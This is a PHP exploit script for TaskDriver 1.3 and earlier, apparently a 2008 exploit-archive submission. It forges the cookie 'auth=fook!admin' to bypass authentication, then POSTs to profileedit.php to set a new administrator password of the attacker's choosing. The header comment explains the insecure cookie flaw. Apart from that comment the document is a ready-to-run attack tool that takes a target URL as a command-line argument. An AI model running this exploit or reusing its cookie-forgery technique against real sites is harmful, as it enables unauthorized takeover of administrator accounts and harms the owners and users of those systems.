<?php /* $Id: taskdriver-1.3.php,v 0.1 2008/12/03 04:04:28 cOndemned Exp $ TaskDriver <= 1.3 Remote Change Admin Password Exploit Bug found && Exploited by cOndemned Download: http://www.taskdriver.com/downtrack/index.php?down=2 Description: This exploit uses insecure cookie handling flaw in order to compromisse the system. In the begining its almost like the one that Silentz wrote for version 1.2 but not exactly. Actually there is no need to use sql injection for gaining admin password (hash). We can just set cookie value to : "auth=fook!admin" access profileedit.php and change his password for whatever we want to x] Next IMO nice thing is that it works both with magic quotes on and off :P ------------------------------------------------------------------- Greetz: ZaBeaTy, Avantura, l5x, str0ke, d2, sid.psycho & TWT, 0in, doctor, Gynvael Coldwind ... http://www.youtube.com/watch?v=f7O6ekKOE9g */ echo "\n[~] TaskDriver <= 1.3 Remote Change Admin Password Exploit"; echo "\n[~] Bug found && Exploited by cOndemned\n"; if($argc != 3) { printf("[!] Usage: php %s <target> <new-password>\n\n", $argv[0]); exit; } list($script, $target, $pass) = $argv; $xpl = curl_init(); curl_setopt_array($xpl, array ( CURLOPT_URL => "{$target}/profileedit.php", CURLOPT_COOKIE => "auth=fook!admin", CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => "password={$pass}" )); $ret = curl_exec($xpl); curl_close($xpl); $out = preg_match_all('#<b>Profile Updated<\/b>#', $ret, $tmp) ? "[+] Done. You can login now\n\n" : "[-] Exploitation failed\n\n"; echo $out; ?>